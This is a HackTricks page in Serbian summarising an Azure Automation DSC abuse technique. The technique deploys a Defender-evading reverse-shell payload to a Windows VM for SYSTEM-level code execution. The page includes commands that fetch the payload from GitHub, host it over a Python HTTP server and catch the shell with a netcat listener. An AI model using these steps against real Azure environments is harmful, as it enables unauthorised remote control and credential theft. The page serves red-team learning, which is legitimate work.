Az - State Configuration RCE

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @hacktricks_live.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Proverite kompletan post na: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Rezime pripreme infrastrukture udaljenog servera (C2) i koraci

Pregled

Proces uključuje postavljanje infrastrukture udaljenog servera za smeštanje modifikovanog Nishang Invoke-PowerShellTcp.ps1 payload-a, nazvanog RevPS.ps1, koji je dizajniran da zaobiđe Windows Defender. Payload se servira sa Kali Linux mašine sa IP adresom 40.84.7.74 koristeći jednostavan Python HTTP server. Operacija se izvršava kroz nekoliko koraka:

Korak 1 — Kreiranje fajlova

Potrebni fajlovi: Potrebna su dva PowerShell skripta:

reverse_shell_config.ps1: Desired State Configuration (DSC) fajl koji preuzima i izvršava payload. Dostupan je na GitHub-u.
push_reverse_shell_config.ps1: Skripta za objavljivanje konfiguracije na virtuelnoj mašini, dostupna na GitHub-u.

Prilagođavanje: Promenljive i parametri u ovim fajlovima moraju biti prilagođeni specifičnom okruženju korisnika, uključujući nazive resursa, putanje fajlova i identifikatore servera/payload-a.

Korak 2 — Zipovanje konfiguracionog fajla

reverse_shell_config.ps1 se kompresuje u .zip fajl, čime je spreman za prenos na Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Korak 3 — Postavi kontekst skladištenja i otpremi

Zipovana konfiguraciona datoteka se otprema u unapred definisani Azure Storage kontejner, azure-pentest, koristeći Azure-ov Set-AzStorageBlobContent cmdlet.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Korak 4 — Priprema Kali mašine

Kali server preuzima RevPS.ps1 payload sa GitHub repozitorijuma.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Skripta se uređuje kako bi se odredila ciljana Windows VM i port za obrnutu ljusku.

Korak 5 — Objavi konfiguracioni fajl

Izvršava se konfiguracioni fajl, što rezultira implementacijom skripte za obrnutu ljusku na određenoj lokaciji na Windows VM.

Korak 6 — Hostujte Payload i postavite osluškivač

Pokreće se Python SimpleHTTPServer kako bi se hostovao payload, zajedno sa Netcat osluškivačem za hvatanje dolaznih veza.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Zakazani zadatak izvršava payload, postižući privilegije na nivou sistema.

Zaključak

Uspješno izvršavanje ovog procesa otvara brojne mogućnosti za daljnje radnje, poput izvlačenja vjerodajnica ili proširenja napada na više virtuelnih mašina. Vodič podstiče kontinuirano učenje i kreativnost u području Azure Automation DSC.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite vidjeti oglašavanje vaše kompanije na HackTricks-u ili preuzeti HackTricks u PDF formatu, provjerite SUBSCRIPTION PLANS!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
Podijelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 7 months ago